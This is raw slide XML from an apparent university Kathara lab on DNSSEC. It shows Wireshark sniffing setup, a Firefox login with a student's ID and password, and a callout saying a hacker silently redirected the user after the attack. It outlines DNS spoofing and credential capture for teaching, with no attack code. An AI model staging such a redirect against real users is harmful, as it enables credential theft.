                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B01A2001-F7B1-804F-BC39-5F8CDB73498B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="10920536" y="2466851"/>
              <a:ext cx="581348" cy="126235"/>
              <a:chOff x="8092857" y="2115830"/>
              <a:chExt cx="581348" cy="126235"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="19" name="Rectangle 15">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{851D9A62-0D93-F1D9-18D5-BB3CA5E0E619}"/>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20" name="Rectangle 16">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AB089D8E-CE34-9808-5698-5B64A66635BF}"/>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21" name="Rectangle 17">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C51956C1-03DF-D5E5-FEE9-61082B3612BD}"/>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1715701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FB2E0A32-A59E-7612-9251-F9780ACA9F1D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>sniff the traffic</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18437" name="Rectangle 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AFF8E2DB-E1FE-B10A-80D1-645659F9A094}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" noProof="0" dirty="0"/>
              <a:t>connect the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" noProof="0" dirty="0" err="1"/>
              <a:t>wireshark</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" noProof="0" dirty="0"/>
              <a:t> device to collision domain B</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" sz="2800" noProof="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" sz="2800" noProof="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" sz="2800" noProof="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" sz="2800" noProof="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" noProof="0" dirty="0"/>
              <a:t>open any browser on the host machine </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" noProof="0" dirty="0"/>
              <a:t>on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" noProof="0" dirty="0"/>
              <a:t>localhost:3000 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" noProof="0" dirty="0"/>
              <a:t>sniff eth1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="Segnaposto data 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7B1F9DF1-1F0D-8325-DDE9-67D58F707DBA}"/>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AE3C7413-D9D4-2179-C5E9-5224B2E2C498}"/>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31" name="Group 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{67286795-F9BA-935F-0E5F-3744B5411972}"/>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EC13EA54-B75A-3AAE-2DC5-04F2EE76EA14}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="607480" y="2668294"/>
              <a:ext cx="10972799"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algn="just" eaLnBrk="1" hangingPunct="1"/>
              <a:r>
                <a:rPr lang="en-US" noProof="0" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg2">
                      <a:lumMod val="60000"/>
                      <a:lumOff val="40000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>user@localhost</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" noProof="0" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg2">
                      <a:lumMod val="60000"/>
                      <a:lumOff val="40000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>:~</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg2">
                      <a:lumMod val="60000"/>
                      <a:lumOff val="40000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>/kithara-</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg2">
                      <a:lumMod val="60000"/>
                      <a:lumOff val="40000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>dnssec</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg2">
                      <a:lumMod val="60000"/>
                      <a:lumOff val="40000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>$</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="1" noProof="0" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>kathara</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="1" noProof="0" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="1" noProof="0" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>lconfig</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="1" noProof="0" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> -n </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="1" noProof="0" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>wireshark</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="1" noProof="0" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> --add </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>B</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" b="1" noProof="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="33" name="Rectangle 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{059A51EC-24EC-09A8-A931-0C514F033872}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="607480" y="2378845"/>
              <a:ext cx="10972800" cy="2894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93CD761F-2706-D473-1E1E-99D04DF635BF}"/>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6C11FC76-01CB-87C6-EA82-F1EF789555C7}"/>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8" name="Rectangle 16">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E2388118-C220-05C9-29AA-B1B9CB515DB1}"/>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7">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{747AF88A-25F8-40E6-3308-9590AC75411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74BB2E-0728-0C05-D06C-D28D6863CD89}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>firefox</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Segnaposto contenuto 6" descr="Immagine che contiene testo, schermata, software, Icona del computer">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4C70885B-EF22-B2CF-DDD6-DEF00C566F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6914" y="1082911"/>
            <a:ext cx="9571511" cy="5436658"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Segnaposto data 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B8299989-A384-72FB-C50C-B02A671230A4}"/>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66A9A6FB-C6EA-D45B-C760-B7A7DB250C7A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" dirty="0" err="1"/>
              <a:t>kathara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" dirty="0"/>
              <a:t> – [ lab: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" dirty="0" err="1"/>
              <a:t>dnssec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" dirty="0"/>
              <a:t> ]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="AutoShape 62">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C154D477-27E0-7774-D23C-F6269593F1E2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5838858" y="1868398"/>
            <a:ext cx="2782277" cy="1421068"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -104244"/>
              <a:gd name="adj2" fmla="val -63765"/>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type "www.uniroma3.it" as the URL in the search bar</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" noProof="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4037806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403625-A0ED-B604-D65A-722241D950A5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>firefox</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Segnaposto contenuto 6" descr="Immagine che contiene testo, schermata, Software multimediale, software&#10;&#10;Il contenuto generato dall'IA potrebbe non essere corretto.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{22207566-239C-BD97-BDF6-B44069170E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4317" y="1259632"/>
            <a:ext cx="8823366" cy="5173699"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Segnaposto data 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BD45A4FE-0FDA-98F9-124C-E9A0D8D3ACDF}"/>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B227D3F8-ADB0-7D89-800A-1BF0ED076365}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" dirty="0" err="1"/>
              <a:t>kathara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" dirty="0"/>
              <a:t> – [ lab: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" dirty="0" err="1"/>
              <a:t>dnssec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" dirty="0"/>
              <a:t> ]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="AutoShape 62">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{132BE253-AD55-1AB0-149B-5DBF11ADEAB0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1476270" y="2696702"/>
            <a:ext cx="2782277" cy="732298"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 75021"/>
              <a:gd name="adj2" fmla="val 14704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enter the student's ID number</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" noProof="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="AutoShape 62">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BC4DD260-AC4F-3296-2EC9-0AE46B8AFE6F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6737775" y="3632866"/>
            <a:ext cx="2782277" cy="732298"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -99549"/>
              <a:gd name="adj2" fmla="val 7500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enter the student's password</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" noProof="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="AutoShape 62">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{215DD7EE-ABF7-1AE6-BB0C-A6F9C5B277A1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1581905" y="5232219"/>
            <a:ext cx="2782277" cy="732298"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 105752"/>
              <a:gd name="adj2" fmla="val -9526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access the student's reserved area</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" noProof="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="462702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title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>lab configuration without </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0" err="1"/>
              <a:t>dnssec</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Subtitle 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0E8EC977-9CBD-1D4F-3EC0-FBD3CCAC19D5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Segnaposto data 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8702B147-66D9-7E32-FBC6-1FEA9983C900}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>last update: Feb 2026</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Segnaposto piè di pagina 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{55B20638-857F-CDA0-A7AB-B7FA27D590B4}"/>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3401389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C94471-3B44-C7AE-C4FC-3B864490C056}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>firefox</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Segnaposto contenuto 6" descr="Immagine che contiene testo, schermata, Software multimediale, software&#10;&#10;Il contenuto generato dall'IA potrebbe non essere corretto.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0152DABC-A532-D363-FFC6-6DEE818796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1928" y="1259632"/>
            <a:ext cx="8645236" cy="5202162"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Segnaposto data 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{92170A47-A081-8C5A-A737-47EDC076B5E6}"/>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AD030900-D07D-22D0-90C5-C5614A83E7D1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" dirty="0" err="1"/>
              <a:t>kathara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" dirty="0"/>
              <a:t> – [ lab: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" dirty="0" err="1"/>
              <a:t>dnssec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" dirty="0"/>
              <a:t> ]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="AutoShape 62">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{041047B7-B373-3B53-F96B-877A4EE667FC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="421677" y="3231090"/>
            <a:ext cx="3594494" cy="1685293"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 60154"/>
              <a:gd name="adj2" fmla="val -130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The hacker redirected the user to the correct web page, so that the user would not notice the attack.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" noProof="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3745239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C80D0-FE9E-AA62-22E6-9C423653639C}"/>
            </a:ext>
          </a:extLst>
        </p:cNvPr>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="34" name="Group 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7E967133-571D-167F-104C-ABDFBF41F451}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="987993" y="2668276"/>
            <a:ext cx="10216014" cy="1521448"/>
            <a:chOff x="1364266" y="2378845"/>
            <a:chExt cx="10216014" cy="1521448"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="35" name="Rectangle 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{900BC650-F981-13F5-7376-153F7999E59B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1364266" y="2668294"/>
              <a:ext cx="10216014" cy="123199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noProof="0" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg2">
                      <a:lumMod val="60000"/>
                      <a:lumOff val="40000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>root@</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg2">
